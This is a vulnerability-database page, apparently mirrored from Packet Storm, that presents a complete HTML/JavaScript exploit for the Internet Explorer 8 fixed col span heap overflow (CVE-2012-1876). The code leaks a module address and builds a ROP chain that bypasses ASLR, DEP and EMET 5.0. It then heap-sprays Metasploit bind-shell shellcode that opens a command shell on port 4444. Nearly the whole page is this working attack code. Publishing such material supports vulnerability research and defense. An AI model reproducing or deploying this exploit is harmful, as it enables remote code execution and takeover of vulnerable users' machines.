Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Internet Explorer 8 Fixed Col Span ID Full ASLR, DEP, And EMET 5.0 Bypass

🗓️ 29 Sep 2014 00:00:00Reported by sicknessType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 32 Views

Internet Explorer 8 Fixed Col Span ID Full ASLR, DEP, And EMET 5.0 Bypas

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Microsoft Internet Explorer Fixed Table Col Span Heap Overflow
2 Aug 201200:00
zdt
0day.today		Internet Explorer 8 Fixed Col Span ID full ASLR & DEP bypass
10 Jan 201300:00
zdt
0day.today		Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 4.1.X Bypass
1 Jul 201400:00
zdt
0day.today		Internet Explorer 8 - Fixed Col Span ID Full ASLR, DEP & EMET 5.1 Bypass (MS12-037)
18 Nov 201400:00
zdt
Circl		CVE-2012-1876
2 Aug 201200:00
circl
Check Point Advisories		Internet Explorer Col Element Remote Code Execution (MS12-037; CVE-2012-1876)
12 Jun 201200:00
checkpoint_advisories
CVE		CVE-2012-1876
12 Jun 201222:00
cve
Cvelist		CVE-2012-1876
12 Jun 201222:00
cvelist
Exploit DB		Microsoft Internet Explorer - Fixed Table Col Span Heap Overflow (MS12-037) (Metasploit)
2 Aug 201200:00
exploitdb
Exploit DB		Microsoft Internet Explorer 8 - Fixed Col Span ID (Full ASLR + DEP Bypass) (MS12-037)
10 Jan 201300:00
exploitdb
Rows per page
`<!--  
** Internet Explorer 8 Fixed Col Span ID full ASLR, DEP and EMET 5.0 bypass  
** Exploit Coded by sickness || EMET 5.0 bypass by ryujin  
** http://www.offensive-security.com/vulndev/disarming-emet-v5-0/ ‎  
** Affected Software: Internet Explorer 8  
** Vulnerability: Fixed Col Span ID  
** CVE: CVE-2012-1876  
** Tested on Windows 7 (x86) - IE 8.0.7601.17514 & EMET 5.0  
-->  
  
<html>  
<body>  
<div id="evil"></div>  
<table style="table-layout:fixed" ><col id="132" width="41" span="9" > </col></table>  
<script language='javascript'>  
  
function strtoint(str) {  
return str.charCodeAt(1)*0x10000 + str.charCodeAt(0);  
}  
  
var free = "EEEE";  
while ( free.length < 500 ) free += free;  
  
var string1 = "AAAA";  
while ( string1.length < 500 ) string1 += string1;  
  
var string2 = "BBBB";  
while ( string2.length < 500 ) string2 += string2;  
  
var fr = new Array();  
var al = new Array();  
var bl = new Array();  
  
var div_container = document.getElementById("evil");  
div_container.style.cssText = "display:none";  
  
for (var i=0; i < 500; i+=2) {  
fr[i] = free.substring(0, (0x100-6)/2);  
al[i] = string1.substring(0, (0x100-6)/2);  
bl[i] = string2.substring(0, (0x100-6)/2);  
var obj = document.createElement("button");  
div_container.appendChild(obj);  
}  
  
for (var i=200; i<500; i+=2 ) {  
fr[i] = null;  
CollectGarbage();  
}  
  
function heapspray(cbuttonlayout) {  
CollectGarbage();  
var rop = cbuttonlayout + 4161; // RET  
var rop = rop.toString(16);  
var rop1 = rop.substring(4,8);  
var rop2 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 11360; // POP EBP  
var rop = rop.toString(16);  
var rop3 = rop.substring(4,8);  
var rop4 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 111675; // XCHG EAX,ESP  
var rop = rop.toString(16);  
var rop5 = rop.substring(4,8);  
var rop6 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 12377; // POP EBX  
var rop = rop.toString(16);  
var rop7 = rop.substring(4,8);  
var rop8 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 642768; // POP EDX  
var rop = rop.toString(16);  
var rop9 = rop.substring(4,8);  
var rop10 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 12201; // POP ECX --> Changed  
var rop = rop.toString(16);  
var rop11 = rop.substring(4,8);  
var rop12 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 5504544; // Writable location  
var rop = rop.toString(16);  
var writable1 = rop.substring(4,8);  
var writable2 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 12462; // POP EDI  
var rop = rop.toString(16);  
var rop13 = rop.substring(4,8);  
var rop14 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 12043; // POP ESI --> changed  
var rop = rop.toString(16);  
var rop15 = rop.substring(4,8);  
var rop16 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 63776; // JMP EAX  
var rop = rop.toString(16);  
var jmpeax1 = rop.substring(4,8);  
var jmpeax2 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 85751; // POP EAX  
var rop = rop.toString(16);  
var rop17 = rop.substring(4,8);  
var rop18 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 4936; // VirtualProtect()  
var rop = rop.toString(16);  
var vp1 = rop.substring(4,8);  
var vp2 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 454843; // MOV EAX,DWORD PTR DS:[EAX]  
var rop = rop.toString(16);  
var rop19 = rop.substring(4,8);  
var rop20 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 234657; // PUSHAD  
var rop = rop.toString(16);  
var rop21 = rop.substring(4,8);  
var rop22 = rop.substring(0,4); // } RET  
  
  
var rop = cbuttonlayout + 408958; // PUSH ESP  
var rop = rop.toString(16);  
var rop23 = rop.substring(4,8);  
var rop24 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 2228408; // POP ECX  
var rop = rop.toString(16);  
var rop25 = rop.substring(4,8);  
var rop26 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 1586172; // POP EAX  
var rop = rop.toString(16);  
var rop27 = rop.substring(4,8);  
var rop28 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 1589179; // MOV EAX,DWORD PTR [EAX]  
var rop = rop.toString(16);  
var rop29 = rop.substring(4,8);  
var rop30 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 1884912; // PUSH EAX  
var rop = rop.toString(16);  
var rop31 = rop.substring(4,8);  
var rop32 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 2140694; // ADD EAX,ECX  
var rop = rop.toString(16);  
var rop33 = rop.substring(4,8);  
var rop34 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 2364867; // MOV DWORD PTR [EAX],ECX  
var rop = rop.toString(16);  
var rop35 = rop.substring(4,8);  
var rop36 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 5036248; // ADD ESP,0C  
var rop = rop.toString(16);  
var rop37 = rop.substring(4,8);  
var rop38 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 1816868; // MOV DWORD PTR DS:[ESI],EAX  
var rop = rop.toString(16);  
var rop39 = rop.substring(4,8);  
var rop40 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 3660458; // MOV EDX,EAX # MOV EAX,EDX # POP ESI  
var rop = rop.toString(16);  
var rop41 = rop.substring(4,8);  
var rop42 = rop.substring(0,4); // } RET  
  
var rop = cbuttonlayout + 1560432; // PUSH EDX # CALL EAX  
var rop = rop.toString(16);  
var rop43 = rop.substring(4,8);  
var rop44 = rop.substring(0,4); // } RET  
  
var getmodulew = cbuttonlayout + 4840; // GetModuleHandleW  
var getmodulew = getmodulew.toString(16);  
var getmodulew1 = getmodulew.substring(4,8);  
var getmodulew2 = getmodulew.substring(0,4); // } RET  
  
  
var shellcode = unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING  
shellcode+= unescape("%u4141%u4141%u4242%u4242%u4343%u4343"); // PADDING  
shellcode+= unescape("%u4141%u4141"); // PADDING  
  
shellcode+= unescape("%u"+rop1+"%u"+rop2); // RETN  
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP # RETN  
shellcode+= unescape("%u"+rop5+"%u"+rop6); // XCHG EAX,ESP # RETN  
  
// EMET disable part 0x01  
// Implement the Tachyon detection grid to overcome the Romulan cloaking device.  
shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN  
shellcode+= unescape("%u"+getmodulew1+"%u"+getmodulew2); // GetModuleHandleW Ptr  
shellcode+= unescape("%u"+rop29+"%u"+rop30); // MOV EAX,DWORD PTR [EAX] # RETN  
shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN  
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN  
shellcode+= unescape("%u10c4%u076d"); // EMET_STRING_PTR (GetModuleHandle argument)  
shellcode+= unescape("%ua84c%u000a"); // EMET_CONFIG_STRUCT offset  
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI  
shellcode+= unescape("%u10c0%u076d"); // MEM_ADDRESS_PTR (Store EMET base address here for later)  
shellcode+= unescape("%u"+rop39+"%u"+rop40); // MOV DWORD PTR DS:[ESI],EAX  
shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN (Get the address of EMET_CONFIG_STRUCT)  
shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]  
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI  
shellcode+= unescape("%u104c%u076d"); // Get fake DecodePointer argument from the stack and update it with the encoded value  
shellcode+= unescape("%u"+rop39+"%u"+rop40); // MOV DWORD PTR DS:[ESI],EAX  
shellcode+= unescape("%u"+rop27+"%u"+rop28); // POP EAX # RETN  
shellcode+= unescape("%u10c0%u076d"); // Get EMET base address Ptr  
shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]  
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN  
shellcode+= unescape("%u80b0%u0004"); // Get DecodePointer offset from the stack  
shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN (DecodePointer in IAT)  
shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]  
shellcode+= unescape("%u"+rop31+"%u"+rop32); // PUSH EAX # RETN  
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI  
shellcode+= unescape("%u9090%u9090"); // Fake DecodePointer argument (Will be patched)  
shellcode+= unescape("%u10bc%u076d"); // MEM_ADDRESS_PTR (Store decoded pointer here here for later)  
shellcode+= unescape("%u"+rop39+"%u"+rop40); // MOV DWORD PTR DS:[ESI],EAX  
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN  
shellcode+= unescape("%u0558%u0000"); // ROP Protections offset  
shellcode+= unescape("%u"+rop33+"%u"+rop34); // ADD EAX,ECX # RETN  
shellcode+= unescape("%u"+rop25+"%u"+rop26); // POP ECX # RETN  
shellcode+= unescape("%u0000%u0000"); // NULL  
shellcode+= unescape("%u"+rop35+"%u"+rop36); // MOV DWORD PTR [EAX],ECX # RETN  
// EMET disable part 0x01 end  
  
// Performing a standard Kumeh maneuver ... (VirtualProtect mona chain)  
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP  
shellcode+= unescape("%u"+rop3+"%u"+rop4); // POP EBP  
shellcode+= unescape("%u"+rop7+"%u"+rop8); // POP EBP  
shellcode+= unescape("%u1024%u0000"); // Size 0x00001024  
shellcode+= unescape("%u"+rop9+"%u"+rop10); // POP EDX  
shellcode+= unescape("%u0040%u0000"); // 0x00000040  
shellcode+= unescape("%u"+rop11+"%u"+rop12); // POP ECX  
shellcode+= unescape("%u"+writable1+"%u"+writable2); // Writable Location  
shellcode+= unescape("%u"+rop13+"%u"+rop14); // POP EDI  
shellcode+= unescape("%u"+rop1+"%u"+rop2); // RET  
shellcode+= unescape("%u"+rop15+"%u"+rop16); // POP ESI  
shellcode+= unescape("%u"+jmpeax1+"%u"+jmpeax2);// JMP EAX  
shellcode+= unescape("%u"+rop17+"%u"+rop18); // POP EAX  
shellcode+= unescape("%u"+vp1+"%u"+vp2); // VirtualProtect()  
shellcode+= unescape("%u"+rop19+"%u"+rop20); // MOV EAX,DWORD PTR DS:[EAX]  
shellcode+= unescape("%u"+rop21+"%u"+rop22); // PUSHAD  
shellcode+= unescape("%u"+rop23+"%u"+rop24); // PUSH ESP  
  
// Store various pointers here  
shellcode+= unescape("%u9090%u9090"); // NOPs  
shellcode+= unescape("%u9090%u14eb"); // NOPs  
shellcode+= unescape("%u4242%u4242"); // Decoded CONFIG structure pointer  
shellcode+= unescape("%u4141%u4141"); // Store BaseAddress address on the *stack*  
shellcode+= "EMET"; // EMET string  
shellcode+= unescape("%u0000%u0000"); // EMET string  
shellcode+= unescape("%u9090%u9090"); // NOPs  
shellcode+= unescape("%u9090%u9090"); // NOPs  
// Store various pointers here  
  
// EMET disable part 0x02  
// MOV EAX,DWORD PTR DS:[076D10BCH]  
// MOV ESI,DWORD PTR [EAX+518H]  
// SUB ESP,2CCH  
// MOV DWORD PTR [ESP],10010H  
// MOV EDI,ESP  
// MOV ECX,2CCH  
// ADD EDI,4  
// SUB ECX,4  
// XOR EAX,EAX  
// REP STOS BYTE PTR ES:[EDI]  
// PUSH ESP  
// PUSH 0FFFFFFFEH  
// CALL ESI  
shellcode+= unescape("%ubca1%u6d10%u8b07%u18b0%u0005%u8100%uccec" +  
"%u0002%uc700%u2404%u0010%u0001%ufc8b%uccb9" +  
"%u0002%u8300%u04c7%ue983%u3304%uf3c0%u54aa" +  
"%ufe6a%ud6ff");  
shellcode+= unescape("%u9090%u9090"); // NOPs  
shellcode+= unescape("%u9090%u9090"); // NOPs  
// EMET disable part 0x02 end  
  
// Bind shellcode on 4444 :)  
// msf > generate -t js_le  
// windows/shell_bind_tcp - 342 bytes  
// http://www.metasploit.com  
// VERBOSE=false, LPORT=4444, RHOST=, PrependMigrate=false,  
// EXITFUNC=process, InitialAutoRunScript=, AutoRunScript=  
// I would keep the shellcode the same size for better reliability :)  
  
shellcode+= unescape("%ue8fc%u0089%u0000%u8960%u31e5%u64d2%u528b" +  
"%u8b30%u0c52%u528b%u8b14%u2872%ub70f%u264a" +  
"%uff31%uc031%u3cac%u7c61%u2c02%uc120%u0dcf" +  
"%uc701%uf0e2%u5752%u528b%u8b10%u3c42%ud001" +  
"%u408b%u8578%u74c0%u014a%u50d0%u488b%u8b18" +  
"%u2058%ud301%u3ce3%u8b49%u8b34%ud601%uff31" +  
"%uc031%uc1ac%u0dcf%uc701%ue038%uf475%u7d03" +  
"%u3bf8%u247d%ue275%u8b58%u2458%ud301%u8b66" +  
"%u4b0c%u588b%u011c%u8bd3%u8b04%ud001%u4489" +  
"%u2424%u5b5b%u5961%u515a%ue0ff%u5f58%u8b5a" +  
"%ueb12%u5d86%u3368%u0032%u6800%u7377%u5f32" +  
"%u6854%u774c%u0726%ud5ff%u90b8%u0001%u2900" +  
"%u54c4%u6850%u8029%u006b%ud5ff%u5050%u5050" +  
"%u5040%u5040%uea68%udf0f%uffe0%u89d5%u31c7" +  
"%u53db%u0268%u1100%u895c%u6ae6%u5610%u6857" +  
"%udbc2%u6737%ud5ff%u5753%ub768%u38e9%uffff" +  
"%u53d5%u5753%u7468%u3bec%uffe1%u57d5%uc789" +  
"%u7568%u4d6e%uff61%u68d5%u6d63%u0064%ue389" +  
"%u5757%u3157%u6af6%u5912%ue256%u66fd%u44c7" +  
"%u3c24%u0101%u448d%u1024%u00c6%u5444%u5650" +  
"%u5656%u5646%u564e%u5356%u6856%ucc79%u863f" +  
"%ud5ff%ue089%u564e%uff46%u6830%u8708%u601d" +  
"%ud5ff%uf0bb%ua2b5%u6856%u95a6%u9dbd%ud5ff" +  
"%u063c%u0a7c%ufb80%u75e0%ubb05%u1347%u6f72" +  
"%u006a%uff53%u41d5");  
  
// Total spray should be 1000  
var padding = unescape("%u9090");  
while (padding.length < 1000)  
padding = padding + padding;  
var padding = padding.substr(0, 1000 - shellcode.length);  
  
shellcode+= padding;  
  
while (shellcode.length < 100000)  
shellcode = shellcode + shellcode;  
  
var onemeg = shellcode.substr(0, 64*1024/2);  
  
for (i=0; i<14; i++) {  
onemeg += shellcode.substr(0, 64*1024/2);  
}  
  
onemeg += shellcode.substr(0, (64*1024/2)-(38/2));  
  
var spray = new Array();  
  
for (i=0; i<100; i++) {  
spray[i] = onemeg.substr(0, onemeg.length);  
}  
}  
  
function leak(){  
var leak_col = document.getElementById("132");  
leak_col.width = "41";  
leak_col.span = "19";  
}  
  
function get_leak() {  
var str_addr = strtoint(bl[498].substring((0x100-6)/2+11,(0x100-6)/2+13));  
str_addr = str_addr - 1410704;  
var hex = str_addr.toString(16);  
//alert(hex);  
setTimeout(function(){heapspray(str_addr)}, 50);  
}  
  
function trigger_overflow(){  
var evil_col = document.getElementById("132");  
evil_col.width = "1245880";  
evil_col.span = "44";  
}  
  
setTimeout(function(){leak()}, 400);  
setTimeout(function(){get_leak()},450);  
setTimeout(function(){trigger_overflow()}, 700);  
  
</script>  
</body>  
</html>  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
29 Sep 2014 00:00Current
6.3Medium risk
Vulners AI Score6.3
EPSS0.87284
internet explorer 8fixed col span idfull aslrdepemet 5.0bypasscve-2012-1876windows 7
32